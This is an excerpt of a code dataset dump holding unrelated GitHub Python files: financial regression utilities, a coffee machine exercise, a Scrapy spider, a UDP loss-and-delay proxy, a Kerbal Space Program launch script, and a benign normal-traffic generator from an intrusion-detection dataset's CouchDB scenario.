Pubbliche \n off = (\n pd\n .read_csv('../data/bid.csv', index_col='Unnamed: 0')\n .drop(\n columns = [\n 'DLY_AWD_QTY',\n 'TYPE', \n 'DLY_PRICE', \n 'DLY_AWD_PRICE'\n ]\n )\n )\n # Resampling\n off = off.set_index(pd.DatetimeIndex(off.index))\n off = off.resample('D').mean()\n # Get OFF(t) as feature\n label = np.roll(off['DLY_QTY'], -1, axis=0)\n # Discard the first values\n off = off[:-1]\n label = label[:-1]\n \n # Read MGP\n mgp = (\n pd\n .read_csv('../data/mgp.csv', index_col='Timestamp')\n .iloc[1:]\n )\n mgp = mgp.set_index(pd.DatetimeIndex(mgp.index))\n mgp = mgp.resample('D').mean()\n mgp = mgp.iloc[:-(TIMESTEPS)]\n\n # Merge dataframes\n merged = pd.merge(\n mgp, \n off, \n left_index=True, \n right_index=True\n )\n \n return merged, label\n \n def selectFeatures(self, dataframe, target):\n \"\"\"Select the features of interest according to \n the wanted minimum correlation among them.\n \n Parameters\n ----------\n dataframe : pandas.DataFrame\n Data\n target : numpy.ndarray\n The target variables\n \n Returns\n -------\n pandas.DataFrame\n Dataframe of the selected features\n \"\"\"\n dataset = dataframe.copy()\n cols=[x for x in dataframe.head()]\n dataset['Target'] = target\n\n corr = dataset.corr()\n corr = corr.drop(columns=cols).dropna()\n corr = corr.where(abs(corr['Target'])>self.corr_limit).dropna()\n features = [x for x in corr.index if x != 'Target']\n \n \n return corr","repo_name":"lucagioacchini/electricity-market-maximizer","sub_path":"analysis/src/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":9770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73194559892","text":"# Questo file contiene le funzioni per la regressione utilizzate nella dissertazione.\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.regression.linear_model as lm\nimport os\nimport sys\nfrom IPython import get_ipython\n\n# Verifica se l'interprete corrente è IPython\nif 'ipykernel' in sys.modules:\n # Se siamo in un notebook, importiamo IPython.display.clear_output\n from IPython.display import clear_output\nelse:\n # Se siamo in un programma, importiamo os.system('cls')\n def clear_output():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef search(ret, freq):\n ret_dict = {\n 'f': ['fac', 'factors'],\n 'e': ['exp', 'expected']\n }\n path = f'{os.getcwd()}//Regression//{freq}//{ret_dict[ret][0]}//{ret_dict[ret][1]}.parquet'\n df = pd.read_parquet(path)\n return df\n\n\nclass OLS:\n # @staticmethod\n # def create_df_factors(index, betas):\n # # Creazione delle tuple per le colonne del dataframe\n # tuples_columns = [(reg, beta) for reg in betas.keys() for beta in betas[reg]]\n # # Creazione del dataframe vuoto\n # df = pd.DataFrame(np.nan, index=index, columns=pd.MultiIndex.from_tuples(tuples_columns))\n # return df\n\n @staticmethod\n def create_df_factors(index, betas):\n \"\"\"\n Funzione che crea un dataframe vuoto con colonne\n date dal dict betas.\n \"\"\"\n tuples_columns = [(reg, beta) for reg in betas.keys() for beta in betas[reg]]\n df = pd.DataFrame(np.nan, index=index, columns=pd.MultiIndex.from_tuples(tuples_columns))\n return df\n \n @staticmethod\n def preprocess_data(X, Y, freq):\n \"\"\"\n Funzione che fa la resampling dei dati non giornalieri e\n restituisce i dati dopo lo shift.\n \"\"\"\n from Methods import resample_returns\n if freq != 'D':\n X = resample_returns(X, freq)\n Y = resample_returns(Y, freq)\n X = X.shift().dropna()\n return X, Y\n\n @staticmethod\n def filter_valid_indices(X, Y):\n \"\"\"\n Funzione che filtra gli indici di Y che non sono presenti in X.\n \"\"\"\n from Methods import intersection, add_year\n # Salviamo l'indice\n stk = Y.name\n save_index = intersection(X.index, Y.index)\n ols_index = intersection(X.index, Y.dropna().index)\n \n # Ora impostiamo i dati\n X = X.loc[ols_index]\n Y = Y.loc[ols_index]\n starting_valid_obs = add_year(ols_index[0])\n \n # Reimpostiamo l'indice:\n ols_index = X.loc[starting_valid_obs: , :].index\n \n return save_index, ols_index, X, Y, stk\n\n @staticmethod\n def print_debug_info(stk, regression_name, date, betas):\n clear_output()\n div = 50*'-'\n print(div, \n stk, \n regression_name, \n date, \n div, \n sep = '\\n')\n\n @staticmethod\n def run_ols(X, Y, betas, date, regression_name, pause):\n \"\"\"\n Funzione che esegue la regressione OLS e restituisce il risultato.\n \"\"\"\n capm = lm.OLS(\n Y.loc[:date].iloc[:-1], \n X.loc[:date, betas[regression_name]].iloc[:-1], \n hasconst=True).fit()\n if pause:\n div = 50*'-'\n print(div, \n 'date saved on factors: ', date,\n 'y.loc[:i].index (start-end):', Y.loc[:date].iloc[:-1], \n 'x.loc[:i].index (start-end) lembrando que x = x.shift().dropna()[:last_date_to_try]:', X.loc[:date, betas[regression_name]].iloc[:-1], \n sep = '\\n')\n input('Pressione uma tecla para a próxima acao: ')\n return list(capm.params)\n\n @staticmethod\n def ols(X, Y, betas: dict, freq='D', pause=False):\n \"\"\"\n Funzione che esegue la regressione OLS su Y rispetto ad X\n in base ai beta passati come dict.\n \"\"\"\n # Attention to avoid circular imports\n \n # Preprocessing dei dati\n X, Y = OLS.preprocess_data(X, Y, freq)\n\n # Filtraggio degli indici validi\n save_index, ols_index, X, Y, stk = OLS.filter_valid_indices(X, Y)\n \n # Inizializzazione del dataframe dei fattori\n factors = OLS.create_df_factors(ols_index, betas)\n\n for date in ols_index:\n clear_output()\n div = 50*'-'\n print(div, \n stk, \n date, \n div, \n sep = '\\n')\n \n for regression_name in list(betas.keys()):\n # Debug INFO\n # OLS.print_debug_info(stk, regression_name, date, betas)\n \n # Esecuzione della regressione OLS\n capm_params = OLS.run_ols(X, Y, betas, date, regression_name, pause)\n\n # Aggiornamento del dataframe dei fattori\n factors.loc[date, (regression_name, betas[regression_name])] = capm_params\n \n # print('factors', factors.loc[date, (regression_name, betas[regression_name])])\n # print('capm', capm_params)\n # input('olhe')\n\n # Restituzione del dataframe dei fattori\n # return factors.iloc\n path = f'{os.getcwd()}//Regression//{freq}//fac//Stocks//{stk}.csv'\n factors.to_csv(path)\n \n @staticmethod\n def start_regression(X: pd.DataFrame, stocks: pd.DataFrame, betas: dict, freq: str):\n # Esegue la regressione lineare per ogni azione\n for stock in stocks.columns:\n OLS.ols(X, stocks[stock], betas, freq = freq)\n \n @staticmethod\n def merge_factors(freq):\n # Ottiene il percorso della directory contenente i dati sui fattori di frequenza specificata\n path = f'{os.getcwd()}//Regression//{freq}//fac//Stocks//'\n # Ottiene il percorso della directory padre dei dati sui fattori di frequenza specificata\n parent_path = f'{os.getcwd()}//Regression//{freq}//fac//'\n \n # Ottiene i nomi dei file dei fattori di ogni azione nella directory dei dati sui fattori di frequenza specificata\n factors_of_stocks = [\n filename[:-4] for filename in os.listdir(path)\n ]\n \n # Ottiene i dati sui fattori per ogni azione e li inserisce in una lista\n list_of_factors_by_stock = [\n pd.read_csv(path + filename + '.csv', index_col = [0], header = [0,1])\n for filename in factors_of_stocks\n ]\n \n # Concatena tutti i dati sui fattori in un unico DataFrame\n df = pd.concat(list_of_factors_by_stock, axis = 1, keys = factors_of_stocks)\n \n return df\n \n @staticmethod\n def save_factors(df, freq):\n # Ottiene il percorso della directory contenente i dati sui fattori di frequenza specificata\n dac_path = f'{os.getcwd()}//Regression//{freq}//fac//'\n \n # Salva il DataFrame dei fattori in formato Parquet nella directory dei dati sui fattori di frequenza specificata\n df.to_parquet(f'{dac_path}factors.parquet')\n \n def save_expected(factors, indices, freq):\n # Copia gli indici e i fattori e modifica il formato degli indici in formato datetime\n indices, factors = indices.copy(), factors.copy()\n indices.index, factors.index = pd.to_datetime(indices.index), pd.to_datetime(factors.index)\n \n # Resample i ritorni:\n if freq != 'D':\n from Methods import resample_returns\n indices = resample_returns(indices, freq)\n # Sposta gli indici di un giorno in avanti e seleziona solo gli indici corrispondenti ai dati sui fattori\n indices = indices.shift().loc[factors.index]\n factors = factors.loc[indices.index]\n \n # Imposta l'indice dei fattori come l'indice degli indici\n factors.index = indices.index\n \n # Moltiplica ogni valore dei fattori per il valore corrispondente degli indici\n df = factors.multiply(indices, level = 2)\n \n # Somma i valori dei fattori per ogni coppia di (data, azione) e salva il risultato in un DataFrame\n df_sum = df.groupby(level = [0,1], axis = 1).sum()\n \n # Salva il DataFrame dei fattori attesi in formato Parquet nella directory dei dati sui fattori di frequenza specificata\n exp_path = f'{os.getcwd()}//Regression//{freq}//exp//'\n df_sum.to_parquet(f'{exp_path}expected.parquet')\n \n @staticmethod\n def SAVE_ALL_ITEMS_IN_OLS(X, Y, betas, freq):\n # First, we calculate and separate each factor from each stock separatedly:\n OLS.start_regression(X, Y, betas, freq = freq)\n # Then we merge all of them into a single file:\n OLS.save_factors(\n OLS.merge_factors(freq),\n freq\n )\n # Now we calculate expected values of stocks:\n OLS.save_expected(\n search('f', freq),\n X,\n freq)\n \n \n @staticmethod\n def DEBUG_OLS_INFO():\n # Stampa un messaggio di debug sulla regressione\n div = 80*'-'\n print(\n div,\n 'La Regressione sta per avviare. Continua? [S/n]: ', \n div, sep = '\\n')\n return input('Risposta: ')\n \n @staticmethod\n def DEBUG_FIX_FACTORS_AND_EXPECTED():\n # Stampa un messaggio di debug sulla regressione\n div = 80*'-'\n print(\n div,\n 'Il programma sta per avviare la Continua? [S/n]: ', \n div, sep = '\\n')\n return input('Risposta: ')\n\n\n\n\n\n # @staticmethod\n # def merge_factors(freq):\n # path = f'{os.getcwd()}//Regression//{freq}//fac//Stocks//'\n # parent_path = f'{os.getcwd()}//Regression//{freq}//fac//'\n\n # factors_of_stocks = [\n # filename[:-4] for filename in os.listdir(path)\n # ]\n\n # list_of_factors_by_stock = [\n # pd.read_csv(path + filename + '.csv', index_col = [0], header = [0,1])\n # for filename in factors_of_stocks\n # ]\n\n # df = pd.concat(list_of_factors_by_stock, axis = 1, keys = factors_of_stocks)\n \n # return df\n \n # @staticmethod\n # def save_factors(df, freq):\n # dac_path = f'{os.getcwd()}//Regression//{freq}//fac//'\n # df.to_parquet(f'{dac_path}factors.parquet')\n \n # def save_expected(factors, indices, freq):\n # indices, factors = indices.copy(), factors.copy()\n # indices.index, factors.index = pd.to_datetime(indices.index), pd.to_datetime(factors.index)\n # indices = indices.shift().loc[factors.index]\n # factors = factors.loc[indices.index]\n # factors.index = indices.index\n # df = factors.multiply(indices, level = 2)\n # df_sum = df.groupby(level = [0,1], axis = 1).sum()\n # clear_output()\n # print(df_sum)\n # exp_path = f'{os.getcwd()}//Regression//{freq}//exp//'\n # df_sum.to_parquet(f'{exp_path}expected.parquet')\n \n # def show_expected(factors, indices):\n # indices = indices.shift().loc[factors.index]\n # factors = factors.loc[indices.index]\n # factors.index = indices.index\n # df = pd.DataFrame(np.nan, index = indices.index, columns = factors.columns)\n # for column in factors.columns:\n # if column[2] in indices.columns:\n # clear_output()\n # print(80*'-')\n # print(column)\n # print(80*'-')\n # df.loc[:, column] = factors[column].multiply(indices[column[2]])\n # return df\n # @staticmethod\n # def start_regression(X: pd.DataFrame, stocks: pd.DataFrame, betas: dict, freq: str):\n # for stock in stocks.columns:\n # OLS.ols(X, stocks[stock], betas, freq = freq)\n \n # @staticmethod\n # def DEBUG_OLS_INFO():\n # div = 80*'-'\n # print(\n # div,\n # 'La Regressione sta per avviare. Continua? [S/n]: ', \n # div, sep = '\\n')\n # input('Risposta: ')\n \n \n","repo_name":"lvoltolini/Finance_file","sub_path":"Methods/OLS.py","file_name":"OLS.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31197357320","text":"\"\"\"setup.py\n\nUsed for packaging wrappeddriver\n\"\"\"\nfrom pathlib import Path\nfrom setuptools import find_packages, setup\n\nAUTHOR = \"Brian Alexander\"\nAUTHOR_EMAIL = \"brian@dadgumsalsa.com\"\nREPO_URL = \"https://github.com/balexander85/wrappeddriver\"\nVERSION = \"0.2.6\"\nDESCRIPTION = \"A simple wrapper for selenium webdriver.\"\n\nwith Path(__file__).parent.joinpath(\"README.md\").open(encoding=\"UTF-8\") as readme:\n README = readme.read()\n\nsetup(\n name=\"wrappeddriver\",\n version=VERSION,\n packages=find_packages(),\n install_requires=[\"selenium>=4.1.0\"],\n python_requires=\">=3.8.0\",\n include_package_data=False,\n license=\"MIT License\",\n description=DESCRIPTION,\n long_description=README,\n url=REPO_URL,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n classifiers=[\n \"Environment :: Web Environment\",\n \"Framework :: Selenium\",\n \"Framework :: Selenium :: 4.1\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.10\",\n ],\n)\n","repo_name":"balexander85/wrappeddriver","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3664139393","text":"stock = [400, 540, 120, 9, 550] # water, milk, beans, cups and cash\n\ndef print_status(stock):\n status = '''\nThe coffee machine has:\n{} of water\n{} of milk\n{} of coffee beans\n{} of disposable cups\n${} of money'''.format(stock[0], stock[1], stock[2], stock[3], stock[4])\n print(status)\n\n\ndef take_action():\n action = input(\"\\nWrite action (buy, fill, take, remaining, exit):\\n\")\n if action == 'buy':\n buy()\n elif action == 'fill':\n fill()\n elif action == 'take':\n take()\n elif action == 'remaining':\n remaining()\n else:\n leave()\n\n\ndef buy():\n global stock\n cust_order = input('\\nWhat do you want to buy? 1 - espresso, 2 - latte, 3 - cappucino, back - to main menu:\\n')\n while cust_order == '1':\n if stock[0] >= 250:\n stock[0] -= 250\n else:\n print('Sorry, not enough water!')\n break\n if stock[2] >= 16:\n stock[2] -= 16\n else:\n print('Sorry, not enough coffee beans!')\n break\n if stock[3] >= 1:\n stock[3] -= 1\n else:\n print('Sorry, not enough disposable cups!')\n break\n stock[4] += 4\n print('I have enough resources, making you a coffee!')\n break\n while cust_order == '2':\n if stock[0] >= 350:\n stock[0] -= 350\n else:\n print('Sorry, not enough water!')\n break\n if stock[1] >= 75:\n stock[1] -= 75\n else:\n print('Sorry, not enough milk!')\n break\n if stock[2] >= 20:\n stock[2] -= 20\n else:\n print('Sorry, not enough coffee beans!')\n break\n if stock[3] >= 1:\n stock[3] -= 1\n else:\n print('Sorry, not enough disposable cups!')\n break\n stock[4] += 7\n print('I have enough resources, making you a coffee!')\n break\n while cust_order == '3':\n if stock[0] >= 200:\n stock[0] -= 200\n else:\n print('Sorry, not enough water!')\n break\n if stock[1] >= 100:\n stock[1] -= 100\n else:\n print('Sorry, not enough milk!')\n break\n if stock[2] >= 12:\n stock[2] -= 12\n else:\n print('Sorry, not enough coffee beans!')\n break\n if stock[3] >= 1:\n stock[3] -= 1\n else:\n print('Sorry, not enough disposable cups!')\n break\n stock[4] += 6\n print('I have enough resources, making you a coffee!')\n break\n else:\n take_action()\n\n\ndef fill():\n global stock\n stock[0] += int(input('Write how many ml of water do you want to add:\\n'))\n stock[1] += int(input('Write how many ml of milk do you want to add:\\n'))\n stock[2] += int(input('Write how many grams of coffee beans do you want to add:\\n'))\n stock[3] += int(input('Write how many disposable cups of coffee do you want to add:\\n'))\n\n\ndef take():\n global stock\n print(f'\\nI gave you ${stock[4]}')\n stock[4] = 0\n\n\ndef remaining():\n print_status(stock)\n\n\ndef leave():\n global x\n x = 1\n\n\nx = 0\nwhile x == 0:\n take_action()\n","repo_name":"rclites/jetbrains","sub_path":"coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12170511330","text":"from PIL import ImageSequence\nfrom PIL import Image as PImage\nfrom .app import renderer\nfrom .core import Color\nfrom .core import Image\nfrom .common import get_bounding_rect_by_mode\nfrom .common import add_on_return\nfrom .common import color_check\nfrom .common import params_check\n\n\n#### Loading & Displaying\n\nclass CImage(object):\n\n def __init__(self, width=10, height=10, data=None):\n self._pixels = data if data else [[0, 0, 0, 1]] * width * height\n self.pixels = []\n self.width = width\n self.height = height\n\n def load_pixels(self):\n self.pixels = [p for p in self._pixels]\n\n def update_pixels(self):\n self._pixels = [p for p in self.pixels]\n\n def set(self, x, y, color):\n index = x + y * self.width\n self.pixels[index] = color\n\n def get(self, x, y):\n index = x + y * self.width\n return self.pixels[index]\n\n def __getitem__(self, index):\n return self._pixels[index]\n\n def __setitem__(self, key, value):\n self._pixels[key] = value\n\n def __repr__(self):\n attrs = {\n 'pixels': self._pixels,\n 'width': self.width,\n 'height': self.height\n }\n return attrs.__repr__()\n\n __str__ = __repr__\n\n\n@params_check(\n CImage,\n (int, float),\n (int, float),\n (int, float),\n (int, float)\n)\n@add_on_return\ndef image(img, a, b, c, d):\n x1, y1, x2, y2, _, y3, _, _ = get_bounding_rect_by_mode(\n a, b, c, d, renderer.image_mode)\n\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n y3 = int(y3)\n w = x2 - x1 + 1\n h = y3 - y2 + 1\n\n return Image(img, x1, y1, w, h)\n\n\n@params_check(int)\ndef image_mode(mode):\n renderer.image_mode = mode\n\n\ndef no_tint():\n renderer.is_tint_enabled = False\n\n\n@color_check\ndef tint(ch=\" \", fg=None, bg=None):\n renderer.is_tint_enabled = True\n c = Color(ch, fg, bg)\n renderer.tint_color = c\n\n\n@params_check(str)\ndef load_image(src):\n image = PImage.open(src)\n images = []\n for frame in ImageSequence.Iterator(image):\n rgb_frame = frame.convert('RGBA')\n w, h = rgb_frame.size\n data = rgb_frame.getdata()\n images.append(CImage(w, h, data))\n return images[0] if len(images) == 1 else images\n","repo_name":"charming-art/charming","sub_path":"src/charming/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"67"} +{"seq_id":"24077879579","text":"# cook your dish here\r\nimport re\r\n\r\nnumberOfCasesRaw = input()\r\nnumberOfCases = int(re.sub(\"\\D\",\"\",numberOfCasesRaw))\r\ndigits = []\r\nmainArr = []\r\ncounter = 0\r\ns =[]\r\n\r\ndef convert(s):\r\n new = \"\"\r\n for x in s:\r\n new += x\r\n return new\r\n\r\n\r\nwhile counter < numberOfCases:\r\n inputNumber = str(input())\r\n digits = [str(i) for i in str(inputNumber)]\r\n\r\n\r\n#print(digits)\r\n\r\n\r\n s = digits.copy()\r\n size = len(digits)\r\n for i in range(0,size):\r\n digits.pop(i)\r\n mainArr.append(int(convert(digits)))\r\n digits.insert(i, s[i])\r\n\r\n print(min(mainArr))\r\n counter += 1\r\n mainArr= []","repo_name":"kalilinukx/python_porjects","sub_path":"hello_world/code_chef_first_problem.py","file_name":"code_chef_first_problem.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34477495038","text":"import scrapy\nfrom ..models.db import Bilibili\n\n\nclass QuotesSpider(scrapy.Spider):\n name = \"bilibili\"\n urls = []\n\n def start_requests(self):\n for i in range(1, 2000000):\n self.urls.append('https://www.bilibili.com/video/av' + str(i))\n for url in self.urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n name = response.xpath('//h1/text()').extract_first()\n if name is not None:\n print(name)\n Bilibili.insert(name=name).execute()\n","repo_name":"zw8677174/spiders","sub_path":"tutorial/tutorial/spiders/bilibili_spider.py","file_name":"bilibili_spider.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39913277505","text":"import heapq\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nq = []\n\n\ndef abs_heap(q, x):\n if x:\n heapq.heappush(q, (abs(x), x // abs(x)))\n else:\n if q:\n val, ab = heapq.heappop(q)\n print(val * ab)\n else:\n print(0)\n\nfor _ in range(n):\n abs_heap(q, int(input()))\n","repo_name":"ozll2b/python_study","sub_path":"class3/BOJ11286.py","file_name":"BOJ11286.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6978617587","text":"import random\nimport sys\nimport numpy\nimport couchdb_min\nfrom faker import Faker\n\n\ndef _update_doc_data(doc):\n return {\n **doc,\n 'name': faker.company(),\n 'phrase': faker.catch_phrase(),\n 'address': {\n 'country': faker.country(),\n 'city': faker.city(),\n 'postcode': faker.postcode(),\n 'streeeet': faker.street_address(),\n }\n }\n\n\ndef connect(admin=False):\n account = random.choice(admins if admin else user)\n return couchdb_min.Server(host, account[0], account[1])\n\n\ndef query(db=None):\n if not db:\n db = random.choice(list(dbs.keys()))\n dbs[db] = connect().get(db).all_ids()\n print(\"GOT %s from database %s\" % (len(dbs[db]), db))\n\n\ndef update_document():\n db = random.choice(list(dbs.keys()))\n if len(dbs[db]) == 0:\n query(db)\n conn = connect().get(db)\n doc = conn.get(random.choice(dbs[db]))\n updated_doc = conn.save(_update_doc_data(doc))\n print(\"Update of doc %s in database %s\" % (updated_doc, db))\n\n\ndef delete_document():\n db = random.choice(list(dbs.keys()))\n if len(dbs[db]) == 0:\n query(db)\n conn = connect().get(db)\n doc_id = random.choice(dbs[db])\n conn.delete(doc_id)\n dbs[db].remove(doc_id)\n\n print(\"Deleted doc %s in database %s\" % (doc_id, db))\n\n\ndef new_document():\n db = random.choice(list(dbs.keys()))\n conn = connect().get(db)\n inserted_doc = conn.save(_update_doc_data({}))\n dbs[db].append(inserted_doc['_id'])\n print(\"Inserted %s into %s\" % (inserted_doc, db))\n\n\ndef wrong_login():\n couchdb_min.Server(host, faker.first_name(), faker.password(8)).info()\n print(\"Executed wrong login\")\n\n\nif __name__ == '__main__':\n faker = Faker()\n\n host = sys.argv[1]\n\n admins = [('admin', 'admin')]\n user = [('dbreader', 'dbreader'), ('guest', 'dbpass')]\n dbs = {\"projects\": []}\n\n while True:\n sys.stdin.readline()\n # for distribution check /_stats\n try:\n mapping = {\n 'wrong': wrong_login,\n 'query': query,\n 'delete': delete_document,\n 'update': update_document,\n 'new': new_document,\n }\n choice = numpy.random.choice(list(mapping.keys()),\n p=[0.1, 0.4, 0.15, 0.15, 0.2])\n mapping[choice]()\n except Exception as e:\n print(\"Exception\", e)\n","repo_name":"LID-DS/LID-DS","sub_path":"scenarios/CVE-2017-12635_6/normal/normal.py","file_name":"normal.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"67"} +{"seq_id":"47227320247","text":"import krpc\r\nimport time\r\nimport os\r\n\r\n#очищаем консоль\r\nclear = lambda: os.system('cls')\r\nclear()\r\n\r\ndef pause_until_end_of_liquid_fuel(conn):\r\n print(\"waiting until liquid fuel ends\")\r\n\r\n vessel = conn.space_center.active_vessel\r\n fuel_amount = conn.get_call(vessel.resources.amount, 'LiquidFuel')\r\n expr = conn.krpc.Expression.less_than(\r\n conn.krpc.Expression.call(fuel_amount),\r\n conn.krpc.Expression.constant_float(0.1))\r\n event = conn.krpc.add_event(expr)\r\n with event.condition:\r\n event.wait()\r\n\r\ndef pause_until_end_of_solid_fuel(conn):\r\n print(\"waiting until solid fuel ends\")\r\n vessel = conn.space_center.active_vessel\r\n fuel_amount = conn.get_call(vessel.resources.amount, 'SolidFuel')\r\n expr = conn.krpc.Expression.less_than(\r\n conn.krpc.Expression.call(fuel_amount),\r\n conn.krpc.Expression.constant_float(0.1))\r\n event = conn.krpc.add_event(expr)\r\n with event.condition:\r\n event.wait()\r\n\r\n\r\ndef second_stage(conn):\r\n vessel = conn.space_center.active_vessel\r\n \r\n #фиксируем направление вбок\r\n vessel.auto_pilot.target_pitch_and_heading(60, 90)\r\n\r\n #Включаем ступень\r\n vessel.control.activate_next_stage()\r\n\r\n #Ждем, пока не кончится топливо\r\n pause_until_end_of_liquid_fuel(conn)\r\n\r\n\r\ndef first_stage(conn):\r\n vessel = conn.space_center.active_vessel\r\n\r\n #фиксируем направление вверх\r\n vessel.auto_pilot.target_pitch_and_heading(90, 90)\r\n\r\n #Включаем ступень\r\n vessel.control.activate_next_stage()\r\n\r\n #Ждем, пока не кончится топливо\r\n pause_until_end_of_solid_fuel(conn)\r\n\r\n\r\ndef preparations(conn):\r\n vessel = conn.space_center.active_vessel\r\n vessel.auto_pilot.engage() #Подготавливаем двигатель\r\n vessel.control.throttle = 1 #Максимальная тяга\r\n\r\n #обратный отсчет\r\n for i in range(4):\r\n print(4-i)\r\n time.sleep(1)\r\n\r\n\r\n\r\n\r\nconn = krpc.connect(name='Sub-orbital flight')\r\n\r\nprint(\"Program start\")\r\npreparations(conn) #обратный отсчет и инициализация аппарата\r\ntime.sleep(0.1)\r\nprint(\"Launch\")\r\nfirst_stage(conn) #вертикальный взлет вверх на первой ступени\r\ntime.sleep(0.1)\r\nprint(\"First stage decoupled\")\r\nsecond_stage(conn) #взлет под наклоном\r\ntime.sleep(0.1)\r\nprint(\"Second stage decoupled\")\r\nprint(\"Program ends\")\r\n","repo_name":"DegKir/luna-twenty-six","sub_path":"Smart in sky.py","file_name":"Smart in sky.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11389012460","text":"import socket\nimport random\nimport time\n \n\nlocalIP = \"140.118.122.155\"\nlocalPort = 5406\n\n# Create a datagram socket\nUDPProxySocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n# Bind to address and ip\nUDPProxySocket.bind((localIP, localPort))\n\nprint(\"UDP Proxy up and listening\")\n\n# Listen for incoming datagrams\ndrop_num = 0\ndeley_num = 0\nwhile(True):\n try: \n proxyMsg , proxyIP = UDPProxySocket.recvfrom(1024)\n\n # print(\"Message from Client: \",proxyMsg.decode())\n # print(\"Client IP Address: \",proxyIP)\n\n # it drops each received packet with 10% probability if i is even number. \n if int(proxyMsg.decode().split(' ')[1]) % 2 == 0:\n if not random.randint(0,9) == 0:\n # Sending a msg to server\n UDPProxySocket.sendto(proxyMsg, (\"140.118.122.155\", 5405))\n else: \n print(proxyMsg.decode(),'is dropped')\n drop_num += 1 \n\n # it delays 100 ms the received packet with 5% probability before forwarding to the server if i is odd number. \n else:\n if random.randint(0,19) == 0: \n time.sleep(0.1)\n deley_num += 1\n print(proxyMsg.decode(),' id delays 100 ms ')\n # Sending a msg to server\n UDPProxySocket.sendto(proxyMsg, (\"140.118.122.155\", 5405))\n\n if int(proxyMsg.decode().split(' ')[1]) >= 10000:\n print('num of drop: ',drop_num)\n print('num of delay: ',deley_num)\n break\n \n except:\n # Create a datagram socket\n UDPProxySocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n # Bind to address and ip\n UDPProxySocket.bind((localIP, localPort))\n\n \n","repo_name":"hanklin0804/Applications_of_Wireless_Networking_Systems_in_IoT","sub_path":"UDP_socket/loss_and_delay/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18859400705","text":"\"\"\"\nThis file contains the code implementation for the figures presented in the research paper. \n\"\"\"\nfrom matplotlib import pyplot as plt \nimport matplotlib.ticker as mticker\nimport matplotlib\nfrom matplotlib.colors import LinearSegmentedColormap\nimport numpy as np\nimport os \nimport csv \nimport pandas as pd \nfrom PIL import Image\n\nclass FigResults(): \n def __init__(self): \n \"\"\"\n Assumes the csv file format is as follows: \n Slot ID,LF ,0: void,1: dirt,3: grass,4: tree,5: pole,6: water,7: sky,8: vehicle,9: object,10: asphalt,12: building,15: log,17: person,18: fence,19: bush,23: concrete,27: barrier,31: puddle,33: mud,34: rubble,mIoU,Mean Dice\n 14,FCIoUV2,0.4372,0,0.8386,0.6658,0.0134,0.1818,0.9595,0.2404,0.4096,0.3384,0.0017,0.0052,0.2578,0.229,0.6192,0.7305,0.2451,0.4939,0.2808,0.4372,0.369255,0.9013\n \"\"\"\n \n ###############################################################################################\n # Retrieve Results from file\n ###############################################################################################\n\n results = {} # store all the results data\n # Retrieve the results from the csv file \n with open (\"figures/results.csv\", 'r') as file: \n csvreader = csv.reader(file)\n for i, row in enumerate(csvreader): \n if i == 0: # Get the header row from the data\n header = row\n else: # get the data from the rest of the csv file. ID is ignored\n results[row[1]] = row[2:]\n\n ################################################################################################\n # Plotting the results\n ################################################################################################\n #----- Prep data ------------- #\n # Create a list containing the results\n data = list(results.values())\n # place as numpy array and update the dtype to float instead of string\n data = np.array(data, dtype=float)\n\n # Create the figure \n fig, axs = plt.subplots(1,len(results), dpi=400)\n fig.set_figheight(8)\n fig.set_figwidth(16)\n fig.subplots_adjust(wspace=0, hspace=0)\n fig.suptitle(\"Loss Function Performance Comparison\", va = 'bottom', ha=\"center\",\n fontsize=\"x-large\", fontweight='bold', y= 0.9)\n axs[0].set_ylabel(ylabel=\"IoU Performance Score\")\n\n # All x-values will be centered on 0. \n x_val = np.ones(len(data[0]))\n lf = list(results) # obtain a list containing the keys for the results\n maj_id = [2,3,6,14] # id for majority classes within the dataset\n\n for i, d in enumerate(data): \n # Violin plot for the figure\n axs[i].violinplot(d[1:], showmeans=True, )\n # plot the individual points on the violin plot\n axs[i].plot(x_val[1:], d[1:], 'o', color='blue', markersize=4, label=\"Minority Classes\")\n # Replot the majority classes in a different colour \n axs[i].plot(x_val[maj_id], d[maj_id], 'o', color='red', markersize=4, label=\"Majority Classes\")\n axs[i].set(xlim = (0.5,1.5), ylim=(-0.1, 1.1), xticks=([]))\n 